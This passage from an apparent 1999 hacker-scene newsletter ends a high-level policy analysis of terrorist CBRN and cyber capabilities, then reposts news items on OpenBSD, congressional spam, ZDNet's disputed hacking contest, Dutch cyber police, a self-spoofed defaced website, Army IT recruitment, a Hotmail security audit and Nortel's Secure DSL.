resources, which only a few groups possess, are necessary to acquire a nuclear
weapons capability. Nevertheless, some terrorist groups, such as the Aum
Shinrikyo in its heyday, the Bin Laden network, or Colombian narco-traffickers,
could, potentially, acquire a miniaturized nuclear weapon because of the vast
financial resources accruing from their multiplicity of legitimate and criminal
business enterprises. To launch a cyber attack, a terrorist group could purchase
relatively inexpensive commercial-off-the-shelf (COTS) software and hardware,
with some weapons of mass disruption software available on hacker bulletin
boards and Web sites.
State Sponsors
Obtaining the sponsorship of a state with WMD resources can be a major
facilitator in transitioning to CBRN/Cyber terrorism. There are a number of
motivations, requirements, and bureaucratic considerations involved in the
relationship between terrorist groups and potential state sponsors regarding the
resort to CBRN/Cyber warfare. However, obtaining the support of a state sponsor
is not automatic or inevitable. Potential state sponsors would have to weigh the
costs and benefits involved in sponsoring CBRN/Cyber operations by terrorist
groups, including providing assistance in the phases of research, development,
production, and operations planning. Other issues concern the conditions and
arrangements for providing the terrorist group with CBRN/Cyber weapons,
training, logistics, diplomatic cover and deniability.
Thus, a number of cost/benefit factors are involved in the relations between state
sponsors and surrogate terrorist groups. For both there are advantages and
disadvantages. For terrorist groups state sponsorship can provide assistance in
terms of funding, intelligence, CBRN/Cyber weaponry, technical expertise,
training, laboratories, logistics, target reconnaissance and surveillance, escape
assistance and safe haven, diplomatic cover, and deniability. Thus, for example,
attaining the support of a state sponsor with nuclear capability (such as Iran,
Iraq, Pakistan or North Korea) would shortcut the process of fabricating a
high-grade nuclear bomb with weapons-grade material, which would be extremely
difficult, although not impossible, for most terrorist groups to develop on their
own. Such a nuclear weapon, however, would likely be miniaturised and of a
tactical, not a strategic variety.
State support need not be explicit or direct. Thus, a state sponsor might
indirectly influence or remotely control a terrorist group's actions. A state sponsor
might use amateur terrorists as dupes or cut-outs to conceal their involvement,
and thus avoid the possibility of retaliation.
External Hurdles
There are a number of external hurdles that terrorist groups must overcome in
order to acquire operational CBRN/Cyber capability. These hurdles include
technological and logistical factors, obtaining state sponsorship and deterrence
by foreign intelligence and counterterrorism agencies.
In terms of technological hurdles, CBRN weapons and Cyber devices vary in the
levels of technological sophistication required for their development,
weaponization and deployment. There is also a clear distinction between CBRN
weapons and Cyber devices.
Cyberterror devices involve high end technologies, although of a different
magnitude than CBRN weapons, because, among other factors, the means
required to access and achieve the massive destruction or breakdown of a critical
infrastructural information technology (IT)-type target involve entirely different
kinds of delivery systems (eg computers).
CBRN weapons are generally at the high end of the technological spectrum,
although within this high end range there are gradations of technological
sophistication that terrorists are likely to utilise because of the variances in their
own operational capabilities. In general, the ranking of CBRN weapons involves
consideration of the levels of technological sophistication required to develop a
particular CBRN weapon and the potential weapon effects. Thus, if potential
weapon effects are being ranked, chemical devices would be placed at the low
end with tactical nuclear and biological weapons at the high end. On the other
hand, in terms of levels of sophistication required to develop CBRN weapons, the
ranking would begin with the lower end chemical and biological to the higher end
radiological and nuclear. The reason for this ranking is the relative ease with
which it is possible to construct crude chemical and biological devices. Weapons
grade biological agents from a producer-country such as Russia are also
particularly vulnerable to theft or smuggling. Radiological and tactical nuclear
weapons are harder to develop, although crude approximations of them are
feasible for some terrorist groups.
Among CBRN weapons, the most substantial hurdles lie in the fabrication and
deployment of nuclear weapons. There are enormous technological tasks involved
in acquiring and utilising weapons grade materials, such as highly enriched
uranium or plutonium, to produce nuclear explosives. Other than the hurdle of
indigenously producing a nuclear device, terrorist groups would have either to
purchase such a device from external sources, to obtain it from a state sponsor,
or to steal or smuggle it. Tactical nuclear weapons, as opposed to strategic
nuclear weapons, are most vulnerable to theft or illegal purchase by terrorist
groups because of their relatively small size, widespread dispersal, and the
absence among older generations of these weapons of effective electronic locks
or Permissive Action Links (PALs) to prevent their unauthorized use. There are
also complex technical requirements involved in deploying a nuclear explosive
device, particularly in dispersing radioactive material.
In all these cases of CBRN weapons, it may not be necessary for terrorist groups
to acquire actual battlefield weapons: certain crude devices or delivery and
dispersal systems may not achieve mass destruction effects, but might be
sufficient to inflict mass terror.
The logistics hurdle involves the capability by terrorist groups to create an
organizational apparatus and transnational network not only to acquire the
technology to produce CBRN/Cyber weapons and devices, but to conduct target
reconnaissance and surveillance, and then to transport, deliver, disperse and
disseminate the weapon against the intended target and, if possible, carry out an
escape.
Obtaining state support represents another external hurdle. A state sponsor
might be reluctant to collaborate with a terrorist group in the CBRN/Cyber warfare
realm because of the enormous political costs and risks of retaliation and
exposure. Moreover, there is always the possibility that a terrorist group might
prove unreliable or inefficient, or, in a worst case scenario, use CBRN/Cyber
weapons against their sponsor. On the other hand, there are certain factors,
conditions and circumstances that are likely to facilitate cooperation and joint
ventures between state sponsors and terrorist groups. Thus, for example, using a
surrogate group could enable a state sponsor to achieve certain strategic
objectives while denying its role in such an attack.
Several trends and developments are creating a new dynamic in the relationship
between state sponsors and terrorist groups. In certain CBRN/Cyber areas,
terrorist groups are less dependent on state sponsors because of widespread
access to the Internet and other resources that make it relatively easy for
terrorist groups to learn how to develop chemical or biological agents
indigenously. Similarly, in terms of cyberwarfare, terrorist groups may have little
need for state sponsors because much of the applicable software and hardware
are available commercially and targeting can be accomplished from a computer
terminal hundreds of miles away from the intended targets.
Terrorist groups are extremely vulnerable to deterrence by foreign intelligence and
counterterrorism agencies. Thus, terrorist groups must overcome the continual
possibility of their activities and operations being detected, monitored, penetrated
and potentially preempted, interdicted or destroyed by these agencies.
Conclusion
CBRN/Cyber terrorist warfare is likely to pose a significant threat in the 21st
century as a result of the confluence of motivation, technical capabilities, and
involvement by state sponsors. This analysis is intended to highlight some of the
internal and external factors, requirements and hurdles that need to be
considered in assessing a terrorist group's current and future development status
and operational capability to conduct CBRN/Cyber warfare. Correlating these
internal and external factors and hurdles would make it possible to forecast which
terrorist groups and state sponsors are likely to embark on CBRN/Cyber warfare,
the types of adaptations and changes they would require to transition to such
warfare, the types of weapons and targeting they are likely to pursue (including
the possible resort to single or multiple CBRN/Cyber weapons and devices), the
timelines for such attacks, and vulnerabilities that could be exploited by foreign
intelligence and counterterrorism agencies to constrain terrorist groups--and,
when applicable, state sponsors--from embarking on such warfare.
@HWA
35.0 Theo de Raadt and OpenBSD Profiled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Weld Pond
The Calgary Herald has published a profile of Theo de
Raadt and arguably the most secure out of the box
operating system there is, OpenBSD.
Calgary Herald
http://www.calgaryherald.com/business/technology/stories/990930/2929913.html
Calgarian heads team ensuring OpenBSD security
Theo de Raadt oversees hundreds of volunteer programmers
Matthew McClearn, Calgary Herald
With nearly two dozen computers scattered
throughout his Ramsay district home, Theo de
Raadt is well equipped to lead an international
software project.
De Raadt has been working for three years on
OpenBSD, a variant of the Unix operating system.
Unix, favoured by academics, researchers
and systems administrators for its power and flexibility,
is the foundation for many popular operating systems,
including Sun, Solaris and Linux.
What Linus Torvalds is to the increasingly popular
Linux, de Raadt is to OpenBSD. He oversees
hundreds of volunteer programmers who pore over OpenBSD's code trying to
make it better, for little more than glory and the satisfaction of making
software better.
Unlike any other operating system, OpenBSD is engineered from the ground
up with security in mind.
"It's just a really cool process to be involved with," he says. "In two and a
half years, we haven't found a vulnerability. That means in the first six
months, we managed to get rid of them all."
That's in stark contrast to other operating systems, most notably
Microsoft's ubiquitous Windows platform. Windows security flaws are
discovered on a weekly basis.
In the early days of Unix, the University of California at Berkeley wanted to
create its own strengthened version. Academics developed Net2, and
attained a Berkeley Software Distribution (BSD) licence for it -- meaning, in
short, that developers can modify it and users can install it freely at no cost.
The university eventually abandoned Net2 because of legal difficulties, but
by then it had developed a considerable following. It spun off FreeBSD and
NetBSD, two free operating systems.
De Raadt was a founder of NetBSD and worked on it for three years
before splitting off following a bitter dispute. In 1996, his computer was
cracked by a friend. After hacking into each other's systems several times,
the two began reviewing BSD's 350 megabytes of code looking for security
holes.
The task proved daunting. The harder they looked, the more problems they
discovered. More and more people pored over the body of code, corrected
problems and submitted the improvements to de Raadt and his inner circle.
That code became OpenBSD.
Three years later, de Raadt is still doing it. So far, he has spent $76,000 of
his own money and dedicated many long days.
A new version of OpenBSD comes out every six months. It can be
downloaded for free at www.openbsd.org or purchased on CD-ROM for $30
US.
"I was eating Ichiban and Kraft Dinner because I was too poor to feed
myself," he recalls. "Then we started selling CDs, and now things are OK."
OpenBSD is sold to the world from Calgary. Louis Bertrand, an engineer
who contributes to OpenBSD, explains that it couldn't be shipped from the
United States because of that country's stringent encryption export laws,
which are designed to keep cryptographic tools out of the hands of criminals
and terrorists.
Canada has no such restrictions. The CD label reads: "Made in Canada --
Land of Free Cryptography."
OpenBSD is earning respect for itself among security-conscious
professionals at banks, research labs, government organizations,
universities and other sites.
Bob Beck, secure systems specialist at the University of Alberta, says it's
used extensively on campus.
"We don't have our OpenBSD machines broken into, and we like that," he
says. "That's mainly due to people in the project going through and
pro-actively auditing the code.
"It seems most vendors -- Sun, HP, Microsoft and others who sell
commercial operating systems -- get their product working and they ship it.
The pressure is to get the product to market fast."
Roy Brander, a research analyst for the City of Calgary's waterworks
division, also admires OpenBSD.
"It's a very solid, stable operating system that doesn't go down," he says. "I
wouldn't accuse other operating systems of being insecure -- OpenBSD can
be made insecure if you're careless and other operating systems can be
made secure if you're extremely careful -- but there's no question that out of
the box, OpenBSD is one of the most secure operating systems you can
get."
Though the server market is beginning to take notice, OpenBSD's user base
is tiny compared even to Linux, which for all its fame accounts for a
minuscule slice of the desktop operating system market -- less than five per
cent. Brander estimates OpenBSD's installations in the tens of thousands.
Consequently, it has a comparatively small body of applications that work
on it and device drivers for hardware can be hard to come by. For that
reason, it's unlikely to crack the desktop market.
De Raadt has earned a reputation for not mincing words. He's openly critical
of the process by which Linux has been developed. He's also unhappy with
developers of commercial software vendors like Microsoft, Sun
Microsystems and Hewlett-Packard, who, he says, take no responsibility
for the numerous security holes in their products.
"They don't care and there's no one to tell them they have to care," he says.
But, he adds, "security is starting to become something that affects the
bottom line" and slowly the industry is being forced to address security
issues.
While de Raadt has his critics, he is also respected for his talent and hard
work. Those qualities would earn him big dollars in the corporate world and
he says he gets a job offer every three days from venture capitalists. He
doesn't take them.
"I'd feel guilty," he says. "I can actually provide something to the community
that they'll use. If I were to work for Sun Microsystems, this wouldn't matter
to their bottom line and I don't think it would see the light of day. I wouldn't
actually be securing people's systems."
Beck adds that even if de Raadt wanted to make it commercial, his fellow
programmers would abandon him. "Going commercial would probably kill it,
in my opinion. There would be much more of a pressure to get it to market
quickly, rather than getting it to market correctly."
Fortunately for OpenBSD, de Raadt says the money can wait.
"If I had a lot of money, what would I do? I'd do this."
@HWA
36.0 SPAM HOUSE
~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Tuesday 5th October 1999 on 1:07 pm CET
"IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE
TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY FRIEND
LOSS 40 LBS. READ THIS! [sic]" - spam hit thousands of House of Representatives
addresses. To make it all funnier, recipients hit the Reply All button, so very fast the mail
servers were down :) Wired.
The House of Spam on the Hill
by Declan McCullagh
3:00 a.m. 5.Oct.99.PDT
The spam began typically enough, with a mass email touting quick weight loss pills.
But by last Friday, the trouble that started with a message sent by one Hill staffer to thousands of House of Representatives addresses had
mushroomed, clogging inboxes, drawing angry accusations, and prompting mass email replies by anti-spam advocates that made the problem even
worse.
"IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY
FRIEND LOSS 40 LBS. READ THIS! [sic]" wrote Cher Castillo, an aide to Rep. Alcee Hastings (D-FL), in the original message.
But many recipients directed their complaints to all the other recipients when they hit Reply All. This further jammed the already-taxed House mail
servers, creating widespread annoyance, and preventing some House offices from receiving any email at all.
One response that was particularly ill-received came from Steve Maviglio, chief of staff for Rep. Rush Holt (D-NJ), who -- perhaps inadvertently --
replied to everyone, lecturing them on the evils of spam and requesting that they support his boss' anti-spam legislation.
"When I first got it [the spam], I immediately reported it to House Information Resources," he said.
Then Maviglio wrote, "How would you like to receive thousands of these each day??? Our constituents do -- costing them money and invading their
privacy. Stop Spam!!!!"
And then? "I hit Reply All," he said.
Maviglio said that Microsoft Exchange showed only a few dozen recipients.
Ooops.
Some of the recipients -- there are about 20,000 Hill email addresses, though not all were copied -- thought that Maviglio had orchestrated the
original diet pill spam to promote the so-called Can Spam Act that his office is co-sponsoring.
He denies it. "All I know is that my name showed up as the first one in many emails so people thought we did it. We're creative but not that
creative. Besides, it's against House rules," he said.
A sampling of the hundreds of replies he received: "Undeliverable mail." "I hate you." "Take me off your list." "Die."
Some irked Hill staffers who saw their inboxes swell last Friday with "get-me-off-this-list" replies say that a new law isn't the answer.
"People are trying to blame other people to solve problems they caused themselves," said one aide, who asked not to be identified. "They should be
disciplined."
Some Congressmen joined the fray, writing that Castillo had violated House rules, and other recipients warned that the diet pills suggested in the
original message should not be used to lose weight.
Ironically, if the Can Spam Act had become law -- currently no hearings are scheduled -- Maviglio could be liable for a US$25,000 fine, or "the
actual monetary loss suffered by the provider as a result of the violation," whichever is larger.
And what about Cher Castillo, the original spammer? Her office refused to comment and she did not respond to interview requests.
One staffer who complained to Hastings' office last week about Castillo said at first they didn't take the spam seriously. "But by today they weren't
laughing," the staffer said.
@HWA
37.0 NET-SECURITY SITE INFO
~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by BHZ, Tuesday 5th October 1999 on 1:01 pm CET
Since yesterday, we at net-sec host two security sites: InterScape Security
(http://interscape.net-security.org) and 403 forbidden (http://forbidden.net-security.org).
Do check both of them. Also, Packet Storm Security mirrors the Default newsletter at
http://packetstorm.securify.com/mag/default
@HWA
38.0 PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 5:30 am CET
There has been quite a lot of discussion on the usefulness of so-called
"hack-the-box" contests. Well, ZDNet shows us how not to do it. Today, ZDNet Labs
revealed that they deliberately neglected to apply some 21 different recent security
patches to the Linux system which participated in the PCWeek hacker challenge,
including one used by the cracker to gain access to the Linux server. ZDNet's
response to the charges of the unfairness of omitting the 21 security patches was
that enterprise businesses would not want to apply 21 individual fixes and that most
large companies would prefer the one large, sweeping-in-scope, fix. This objection
didn't prevent ZDNet Labs from hypocritically applying Microsoft's latest huge service
release for Windows NT in time for the test though. Linux Today
http://linuxtoday.com/stories/10767.html
ZDNet Admits Mistakes in Recent Security Test
Oct 4, 1999, 23:19 UTC
[ The opinions expressed by authors on Linux Today are their own. They speak only for themselves
and not for Linux Today. ]
By Arne W. Flones
Regarding the recent Hacker Shootout, ZDNet Labs today admitted that they deliberately ignored an
embarrassing 21 security upgrades to one of the two systems under test. (See PC Week: CGI script opens
door)
In this alleged test of security, ZDNet Labs invited "hackers" [sic] to try to break into two different
computers, one running Windows NT and one running the Red Hat distribution of Linux. This came on the
heels of August's similar battle between Windows NT and an Apple-based Linux distribution which drew a
lot of publicity. Under criticism from the Linux community for the lack of objectivity in the test, ZDNet's
director, John Taschek responded,
[The test] was designed and put together by PC Week for the purpose of testing security
implementation. We don't care which operating system (if any) is broken into first. We want
to establish the basis for a story on the best practices for implementing security.
And later he said,
We don't care who wins or loses--in fact we're not looking to report a winner or loser. Just
on implementations.
In spite of continued protests, the test proceeded and on September 24 the Linux site was cracked using a
combination of a weakness in Web programming and a security hole in a program called crond, part of
every Linux installation.
When the method used by the cracker was revealed, it was immediately apparent that both of the security
holes could have easily been closed. The first hole, within a type of World Wide Web program called a
CGI script, could have been avoided by paying closer attention to security when writing the script. This
hole had nothing to do with Linux, but was in a separate application. The second hole had been publicly
revealed in August by Red Hat, the distributor of the Linux system under test. Although ZDNet labs might
have inadvertently slipped up on the first hole, they would have certainly known about the second. The
cracker used both holes to crack into the system.
Today, ZDNet Labs revealed that they deliberately neglected to apply some 21 different recent security
patches to the Linux system, including one used by the cracker to gain access to the Linux server. It is this
admission that has raised the hackles of knowledgeable computer users, security experts and the Linux
community.
As the source instructions which make up Linux are freely available to anybody who wants them, there are
no reasons to wait to make security changes available to the public. So this number of security patches is
common in the Linux world. As soon as a security hole is found, it is quickly patched and the fix is
immediately posted to the public forums on the Net. The ability to look at all the source instructions enables
anybody to verify the correctness of the patch. Typically, a program to exercise the exploitation is available
as well. This dramatically reduces the risk in applying these patches. The scope of the changes is very
narrow and is very easily tested in isolation. Therefore, with a small effort, and in a very short time, an IT
manager can know the impact the patch will have on her all-important systems. The result is that the patch
can be applied quickly and with the assurance that nothing will break but the cracker's ability to
compromise the company's data.
This is very unlike the Windows NT world, where Microsoft keeps all the source instructions secret.
Microsoft Windows, by nature of its proprietary design, must withhold security information and release the
fixes all at once in a larger, less frequent, service release. The policy of security through obscurity is
arguable. But the impact of fixing security holes with an infrequent and all encompassing software upgrade
is not. It can make testing a nightmare because individual fixes are not testable in isolation from other
changes. And, since Microsoft lumps the many security fixes with other, general improvements, adding a
Microsoft service release enterprise-wide is a very, very risky affair. One never knows what will break.
Therefore, the rules of the game are very different for Windows than they are for Linux. ZDNet Labs
conveniently ignores this fact.
ZDNet's response to the charges of the unfairness of omitting the 21 security patches was that enterprise
businesses would not want to apply 21 individual fixes and that most large companies would prefer the one
large, sweeping-in-scope, fix. ZDNet provides no basis for this absurd claim. Their claim goes against
common practice in the industry and it is against common sense. It is only in the Microsoft world where an
untestable, monolithic software release is preferable to a few much smaller, and manageable, perturbances.
Nota bene: ZDNet's objection to the 21 easily audited and tiny patches didn't prevent ZDNet Labs from
hypocritically applying Microsoft's latest huge service release for Windows NT in time for the test.
ZDNet's claims are unsupportable. Not only was ZDNet Labs responsible for allowing the installation of a
flubbed CGI script which allowed the cracker to peek into the Linux system, they were negligent in
ignoring 21 known security holes. Their admission today that they deliberately chose not to apply these
patches has tainted their test. They knew that every cracker would look first at these 21 chinks in Linux's
armor. No wonder it only took a few days for the Linux system to be cracked. ZDNet's incompetence
assured it.
This comes as close to professional malfeasance as I have ever seen. With today's knowledge it is
impossible for ZDNet to claim even vestigial objectivity. With what we now know of this affair, to continue
the charade would be an injustice.
@HWA
39.0 DUTCH "CYBERCOPS" PATROLLING THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 5:00 am CET
Dutch police opened their fight against Internet crime Monday by naming 15
"cybercops" to target on-line offenses ranging from pedophilia to credit-card fraud. The
team will patrol the country's Internet sites in search of on-line crime, using new
computer surveillance equipment and old-fashioned police techniques. The Internet
officers will be able to tap phone lines and, with a court order, will be allowed to crack
into computer systems to find incriminating evidence - the virtual equivalent of a
search warrant. Read more
http://www.techserver.com/noframes/story/0,2294,500041373-500067208-500122112-0,00.html
Dutch 'cybercops' to patrol information highway
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
AMSTERDAM, Netherlands (October 4, 1999 3:46 p.m. EDT http://www.nandotimes.com) - Dutch police
opened their fight against Internet crime Monday by naming 15 "cybercops" to target on-line offenses
ranging from pedophilia to credit-card fraud.
The team will patrol the country's Internet sites in search of on-line crime, using new computer
surveillance equipment and old-fashioned police techniques.
"They will go after all crime committed on the Internet and that could range from child pornography
to credit card fraud, or the sale of illegal medicine and software," police spokesman Albert Folgerts
said.
The Internet officers will be able to tap phone lines and, with a court order, will be allowed to
crack into computer systems to find incriminating evidence - the virtual equivalent of a search
warrant.
@HWA
40.0 BIKE WEB SITE HACKS ITSELF
~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 4:10 am CET
Hack back. That's what Hoffman Bikes decided to do after its Web site was defaced
for the fourth time by the same hacker group in the past two weeks. "Good riders,
bad nerds," the group called "r 1 3 9" wrote, mockingly. Marketing director Bryan
Baxter finally responded by posting, himself, text and images that spoofed the company's
image and security at its regular address, www.hoffmanbikes.com. Lol!
http://cnn.com/TECH/computing/9910/04/hacker.week/index.html
Bike Web site hacks itself after
four attacks
By Robin Lloyd
CNN Interactive Senior Writer
October 4, 1999
Web posted at: 4:47 p.m. EDT (2047 GMT)
(CNN) -- Hack back. That's what Hoffman Bikes decided to do after its Web
site was defaced for the fourth time by the same hacker group in the past two
weeks.
"Good riders, bad nerds," the group called "r 1 3 9" wrote, mockingly.
Marketing director Bryan Baxter finally responded by posting text and images
that spoofed the company's image and security at its regular address,
www.hoffmanbikes.com.
"If they wanted to make us look stupid, we decided to help them out," he said.
The site for the Oklahoma-based bike manufacturer was just one of some two
dozen to be defaced by hackers in the past 10 days, according to attrition.org,
a site that logs and mirrors Web defacements.
But it was the only one to respond with humor.
"We decided that if they were gonna get in that we would help them out,"
Baxter said. He crafted the site as an online catalog, not for e-commerce, so
security was not a priority.
"It's become a little soap opera," he said. "We just decided not to be too uptight
about it. They could've done stuff that was a lot worse. They could've put
porn up on it or something."
Baxter put up the counter-hack himself, featuring a less-than-flattering picture
of Matt Gipson, one of Hoffman's sponsored riders, with a pointer from his
head to the words "duh, huh?"
The counter-site also offered links to Hoffman's real site and the previous
hacks to the site, as well as to lists for site visitors in case they wanted to join r
1 3 9 or get work at Hoffman or give it Internet security advice.
That drew about 100 responses and dozens of phone calls.
'Learning as we go'
Baxter admitted that the rider-owned company is not "super good" yet at
operating its Web site. "We're learning as we go," he said.
Hoffman pays for its server time in kind from a friend in Texas. "We tried to
change some things," after the first hack, he said. "We tried four times with
different server settings and they were still getting in." So he gave up, in
effect.
If the site's security is breached again, Hoffman will just take its site down
before trying again, he said.
Patrice Rapalus, director of Computer Security Institute in San Francisco, said
beefed up security, patching holes and reports to the authorities are
recommended responses to hackers, not humor.
Defacement, the equivalent of graffiti on a bricks and mortar business, is the
least of a firm's computer security concerns, she said.
That kind of hack is impossible to hide from consumers. Many companies
prefer to cover up the more serious hack -- intrusions into computer networks,
she said.
Companies hate to admit one likely scenario -- they are unaware that their
security has been breached, Rapalus said.
The number of companies reporting security breaches in the past three years
rose from 17 percent to 32 percent, she said.
And that's just the companies willing to own up to intrusions of which they are
aware.
Security breaches, even Web site defacements, mar a firm's image and can
damage its electronic business.
"It would undermine any kind of trust someone would have in your
organization and the ability of your organization to safeguard confidential
information or credit card information," she said.
Brian Martin, of attrition.org, said that Hoffman's response to being hacked
multiply was humorous but irresponsible.
"It undermines the idea of secure Web sites and gives their customers the
impression that the (site) administrator simply does not care about security that
much," Martin said.
Smaller businesses at lower risk
Sites for government agencies and banks are far more attractive to hackers
with criminal intent, Rapalus said.
"Like anything else, it's follow the money," she said. CSI, a membership
association, is comprised mainly of Fortune 500 firms and government
agencies.
A list of sites hacked in the past 10 days, as reported by attrition.org, also
illustrates that point.
They included DeltaNet, PanAmSat, a Le Monde publicity site, Altamira
International Bank, Mount Gay Rum site, DC ArtBeat, Seoul National
University, Web Yes Singapore and a State of Utah learning resources site.
Smaller businesses, like larger ones, need to worry about online security as
they launch Internet sites, Rapalus said, but they generally are not the focus of
the most malicious hackers.
She recommended a cooperative effort between law enforcement and
industry to crack down on the big offenders.
Web site tallies hacks
Attrition.org has collected statistics on targets of hacking since it went online
in 1995. By its count, there have been 79 hacks to general government
systems, 27 to NASA, 19 to Army systems, 47 to other military systems, 103
to educational institutions and 1,042 to commercial systems.
Groups called Antichrist and Forpaxe lead the pack, with 148 and 140 hacks
credited to them by attrition.org.
Global Hell, at least one of whose members recently was arrested as a
result of FBI raids, gets credited with 118 hacks. More than 40 other groups
are credited with anywhere from two to 50 hacks.
Some hackers evidently see a credit on attrition.org as a badge of honor, with
a group called TREATY's hack against IDG Co. claiming in the text of its
defacement that it was "just doing it" to get mentioned on attrition.org.
No contact with hackers
Unlike many hacks, the r 1 3 9 defacements posted no e-mail contact for the
group. Hackers are notorious for signing their work and offering a valid, but
anonymous, mailbox.
But Baxter, of Hoffman Bikes, said he suspected some of the e-mail the
company received in response to its counter-hack was from r 1 3 9 members.
Those correspondents said they would trade security advice for autographs
from Matt Gipson, the Hoffman-sponsored rider.
"We offered it to them, but we haven't gotten a response back yet," he said.
Hoffman has decided against pressing charges or other legal action against the
hackers even if they did come forward, Baxter said.
"It appears we've turned it into a good thing, at least something entertaining.
But it can be a very, very bad thing. I wish it wasn't possible to do."
@HWA
41.0 ARMY STUDYING IT RECRUITMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 3:50 am CET
The Army has kicked off a yearlong study to help determine how to better recruit and
maintain its information technology work force, with an emphasis on how the service
can use financial inducements to attract workers. The charter of the Army Information
Technology/Information Assurance Workforce Issues Study placed compensation first
in the list of issues and challenges the Army must address to attract and retain IT
personnel in a technology-driven economy. The study also will look at non-monetary
inducements. Read more
http://www.fcw.com/pubs/fcw/1999/1004/web-itsurvey-10-04-99.html
OCTOBER 4, 1999 . . . 14:56 EDT
Army studying IT recruitment
BY BOB BREWIN (antenna@fcw.com)
The Army has kicked off a yearlong study to help determine how to better
recruit and maintain its information technology work force, with an emphasis on
how the service can use financial inducements to attract workers.
The charter of the Army Information Technology/Information Assurance
Workforce Issues Study placed compensation first in the list of issues and
challenges the Army must address to attract and retain IT personnel in a
technology-driven economy. The study also will look at non-monetary
inducements.
Lt. Gen. Larry Ellis, Army deputy chief of staff for operations and plans, said
the study will help the Army produce policy and resource recommendations to
enhance IT recruitment, retention, education and training.
In addition, the Army will use the study to develop a table of organization for its
Force XXI digitized battleforce by next August.
Gen. John Keane, Army vice chief of staff, described IT and information
systems as the "dominant" issues the Army needs to keep in mind as it develops
and fields the digitized battle force. The soldiers and civilian Army employees
who operate those Force XXI systems "will always remain the linchpin to
ensure success in information dominance and to counter the continued threats
and security issues for our information networks,'' Keane said in a Sept. 22
memo.
Keane asked the help of all Army IT professionals in developing these new IT
personnel policies and procedures by filling out an online survey
(www.itiasurvey.army.pentagon.mil) no later than Nov. 20.
@HWA
42.0 TRUSTE OK'S HOTMAIL FIXES
~~~~~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 3:30 am CET
Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail
users in August, according to the results of an outside audit released today.
Microsoft in August voluntarily agreed to the audit at the request of the Web privacy
seal program Truste. Until today, however, there had been doubts about whether any
results of the audit would be made public. News.com
http://news.cnet.com/news/0-1005-200-807131.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e
Truste OKs Hotmail security fixes
By Courtney Macavinta
Staff Writer, CNET News.com
October 4, 1999, 4:40 p.m. PT
Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail users in August, according to
the results of an outside audit released today.
The announcement disclosed only that a "Big Five" accounting firm reviewed the "nature, extent, and cause of the problem," as
well as the solutions that Microsoft put in place. As part of the audit, Microsoft employees who fixed the hole were interviewed,
and the unnamed firm tested the solution to make sure the problem wouldn't reoccur.
As previously reported, the review of Hotmail was commissioned after the service was pulled offline for two hours when it was
discovered that accounts could be accessed without passwords as long as a user's name--which is commonly found in a Hotmail
address--was known.
Microsoft said it fixed the problem the same day and has since admitted that the hole was the result of a string of code that
hadn't been tested for security.
Microsoft in August voluntarily agreed to the audit at the request of the Web privacy seal program
Truste, which Microsoft generously sponsors. Until today, however, there had been doubts about
whether any results of the audit would be made public.
"Both Microsoft and Truste have confirmed that we've effectively resolved that incident, and that we
are in compliance with Truste's licensing agreement," Richard Purcell, data practices director at
Microsoft, said today.
"The firm had technical experts, and they were careful about reviewing the solutions we put in place
at the code level," he added.
Truste monitors participating sites' privacy practices and ensures that licensees "help protect the
security" of the information they collect and store.
Watchdogs skeptical
Based on guidelines set by the American Institute of Certified Public Accountants (AICPA), which oversees the conduct of major
firms, Microsoft and others participating in the audit were restricted from releasing the accounting firm's full report.
But consumer advocacy group Junkbusters had called for full disclosure of the report, insisting that if the results weren't made
public, Hotmail users would have no assurance that their accounts are safeguarded.
Despite the announcement that Hotmail is secure, Jason Catlett, founder of Junkbusters, was not satisfied with the level of detail
in the companies' announcement.
"All Microsoft and Truste are saying is that someone went in with a notebook and pen and asked questions, but the company is
not revealing the name of the auditor or the instructions to the auditor--the summary is vague," Catlett said. "They had the chance
to commission an audit that could have been open."
Specifically, Microsoft had commissioned an "Agreed-Upon Procedures Engagement," in which the parameters of the review are
set by the certified public account, the client, and usually a specified third party, in this case Truste. The results of this type of
report can only be made available to those parties, according to the AICPA.
The online industry and the Clinton administration have endorsed so-called privacy seal programs as a way to safeguard
anonymity. But as more Net users provide valuable personal information in exchange for goods and custom Web content, privacy
advocates say better laws are needed to shield privacy, because industry guidelines don't come with strong enough enforcement.
Truste says its voluntary efforts are effective.
"From our point of view this does demonstrate that the resolution process we have in place works," said Bob Lewin, executive
director of Truste.
But for Microsoft, the review only puts to rest concern over the August 20 Hotmail security hole. The company has since been
investigating programs that people could use to generate false passwords to crack open Hotmail accounts.
"We can't prevent malicious hackers from targeting these platforms," Purcell added. "But it's important to say that we really have
a strong sense of responsibility about protecting the security of customers' information."
@HWA
43.0 SECURE DSL TECHNOLOGY
~~~~~~~~~~~~~~~~~~~~~
From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 1:20 am CET
Nortel Networks has taken the wraps off a network-based secure digital subscriber
line (DSL) technology. The idea behind the technology, known as Secure DSL, is that
it stops any electronic incursions or eavesdropping on the "always-on" DSL
connections that many businesses and serious home users of the Internet are now
starting to use. The system works by securing each DSL line with network-based,
packet firewalls, so precluding outside attacks. Full story
http://www.currents.net/newstoday/99/10/03/news5.html
Secure DSL Technology
